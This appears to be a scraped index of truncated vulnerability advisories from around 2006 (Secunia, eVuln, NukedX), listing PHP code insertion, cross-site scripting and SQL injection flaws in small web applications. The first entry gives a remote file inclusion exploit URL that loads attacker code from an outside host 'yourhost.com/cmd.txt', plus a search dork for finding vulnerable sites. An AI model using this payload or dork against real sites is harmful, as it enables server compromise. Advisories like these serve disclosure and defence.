Clansys <= v.1.1 (index.php page) PHP Code Insertion Vulnerability

Exploit for unknown platform in category web applications ================================================================== Clansys GET - http://victim/ClanSysPath/index.php?page=PHPCode EXAMPLE - http://victim/ClanSysPath/index.php?page=&s=http://yourhost.com/cmd.txt? 0day.today 2018-03-19...

Clansys 1.1 - &#039;index.php&#039; PHP Code Insertion

NukedX Security Advisory Nr 2006-29 ClanSys v1.1 index.php page PHP Code Insertion Vulnerability Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Original advisory: http://www.nukedx.com/?viewdoc=29 Dork: "ClanSys v.1.1" 2.400 pages. Fu...

[SA19727] @1 Event Publisher Multiple Vulnerabilities

TITLE: @1 Event Publisher Multiple Vulnerabilities SECUNIA ADVISORY ID: SA19727 VERIFY ADVISORY: http://secunia.com/advisories/19727/ CRITICAL: Moderately critical IMPACT: Cross Site Scripting, Exposure of sensitive information WHERE: From remote SOFTWARE: @1 Event Publisher...

[SA19723] @1 Table Publisher Script Insertion Vulnerability

TITLE: @1 Table Publisher Script Insertion Vulnerability SECUNIA ADVISORY ID: SA19723 VERIFY ADVISORY: http://secunia.com/advisories/19723/ CRITICAL: Less critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: @1 Table Publisher http://secunia.com/product/9472/ DESCRIPTION: Jericho ha...

phpLDAPadmin multiple vuln.

phpLDAPadmin multiple vuln. Vuln. discovered by : r0t Date: 21 april 2006 vendorlink:http://phpldapadmin.sourceforge.net/ affected versions:phpLDAPadmin 0.9.8 and prior orginal advisory: http://pridels.blogspot.com/2006/04/phpldapadmin-multiple-vuln.html Vuln. Description: phpLDAPadmin contains a...

phpldapadmin -- Cross-Site Scripting and Script Insertion vulnerabilities

Secunia reports: phpLDAPadmin have some vulnerabilities, which can be exploited by malicious users to conduct script insertion attacks and by malicious people to conduct cross-site scripting attacks. 1 Some input isn't properly sanitised before being returned to the user. This can be exploited to...

[eVuln] N.T. Version 1.1.0 XSS and PHP Code Insertion Vulnerabilities

New eVuln Advisory: N.T. Version 1.1.0 XSS and PHP Code Insertion Vulnerabilities http://evuln.com/vulns/121/summary.html --------------------Summary---------------- eVuln ID: EV0121 CVE: CVE-2006-1657 CVE-2006-1658 Vendor: Chucky A. Ivey Software: N.T. Sowtware's Web Site: http://www.v-gfx.net/...

BluePay Manager v2.0 Script Insertion Vulnerability

BluePay Manager v2.0 Script Insertion Vulnerability Vuln. discovered by : r0t Date: 18 april 2006 vendor:bluepay.com affected versions:v2.0 and previous orginal advisory: http://pridels.blogspot.com/2006/04/bluepay-manager-v20-script-insertion.html Vuln. description: Input passed to the "Account...

[Full-disclosure] Secunia Research: Adobe Document Server for Reader Extensions Multiple Vulnerabilities

====================================================================== Secunia Research 13/04/2006 Adobe Document Server for Reader Extensions Multiple Vulnerabilities ====================================================================== Table of Contents Affected...

[eVuln] QLnews XSS and PHP Code Insertion Vulnerabilities

New eVuln Advisory: QLnews XSS and PHP Code Insertion Vulnerabilities http://evuln.com/vulns/113/summary.html --------------------Summary---------------- eVuln ID: EV0113 CVE: CVE-2006-1575 CVE-2006-1576 Software: QLnews Sowtware's Web Site: http://www.vscripts.pl/ Versions: 1.2 Critical Level:...

[eVuln] VNews Multiple Vulnerabilities

New eVuln Advisory: VNews Multiple Vulnerabilities http://evuln.com/vulns/112/summary.html --------------------Summary---------------- eVuln ID: EV0112 CVE: CVE-2006-1543 CVE-2006-1544 CVE-2006-1545 Software: VNews Sowtware's Web Site: http://www.vscripts.pl/?id=vnews Versions: 1.2 Critical Level...

[eVuln] [V]Book Multiple Vulnerabilities

New eVuln Advisory: VBook Multiple Vulnerabilities http://evuln.com/vulns/111/summary.html --------------------Summary---------------- eVuln ID: EV0111 CVE: CVE-2006-1561 CVE-2006-1562 CVE-2006-1563 Software: VBook Sowtware's Web Site: http://www.vscripts.pl/?id=vbook2 Versions: 2.0 Critical Leve...

[SA19580] Gallery Unspecified Script Insertion Vulnerabilities

TITLE: Gallery Unspecified Script Insertion Vulnerabilities SECUNIA ADVISORY ID: SA19580 VERIFY ADVISORY: http://secunia.com/advisories/19580/ CRITICAL: Moderately critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: Gallery 1.x http://secunia.com/product/1933/ DESCRIPTION: Some...

[SA19551] ARIA Multiple Script Insertion Vulnerabilities

TITLE: ARIA Multiple Script Insertion Vulnerabilities SECUNIA ADVISORY ID: SA19551 VERIFY ADVISORY: http://secunia.com/advisories/19551/ CRITICAL: Moderately critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: ARIA 0.x http://secunia.com/product/9226/ DESCRIPTION: Some...

[SA19512] gtd-php Cross-Site Scripting and Script Insertion Vulnerabilities

TITLE: gtd-php Cross-Site Scripting and Script Insertion Vulnerabilities SECUNIA ADVISORY ID: SA19512 VERIFY ADVISORY: http://secunia.com/advisories/19512/ CRITICAL: Moderately critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: gtd-php 0.x http://secunia.com/product/9122/...

[SA19448] VBook Multiple Vulnerabilities

TITLE: VBook Multiple Vulnerabilities SECUNIA ADVISORY ID: SA19448 VERIFY ADVISORY: http://secunia.com/advisories/19448/ CRITICAL: Moderately critical IMPACT: Cross Site Scripting, Manipulation of data, System access WHERE: From remote SOFTWARE: VBook 2.x http://secunia.com/product/9051/...

[SA19439] Cholod Mysql based message board Script Insertion and SQL Injection

TITLE: Cholod Mysql based message board Script Insertion and SQL Injection SECUNIA ADVISORY ID: SA19439 VERIFY ADVISORY: http://secunia.com/advisories/19439/ CRITICAL: Moderately critical IMPACT: Cross Site Scripting, Manipulation of data WHERE: From remote SOFTWARE: Cholod Mysql based message...

[SA19309] webcheck Website Content Script Insertion Vulnerability

TITLE: webcheck Website Content Script Insertion Vulnerability SECUNIA ADVISORY ID: SA19309 VERIFY ADVISORY: http://secunia.com/advisories/19309/ CRITICAL: Moderately critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: webcheck 1.x http://secunia.com/product/8877/ DESCRIPTION: A...

[SA19290] OSWiki Username Script Insertion Vulnerability

TITLE: OSWiki Username Script Insertion Vulnerability SECUNIA ADVISORY ID: SA19290 VERIFY ADVISORY: http://secunia.com/advisories/19290/ CRITICAL: Moderately critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: OSWiki 0.x http://secunia.com/product/8831/ DESCRIPTION: A vulnerability...

[SA19263] Streber Unspecified Script Insertion Vulnerability

TITLE: Streber Unspecified Script Insertion Vulnerability SECUNIA ADVISORY ID: SA19263 VERIFY ADVISORY: http://secunia.com/advisories/19263/ CRITICAL: Moderately critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: Streber 0.x http://secunia.com/product/8792/ DESCRIPTION: A...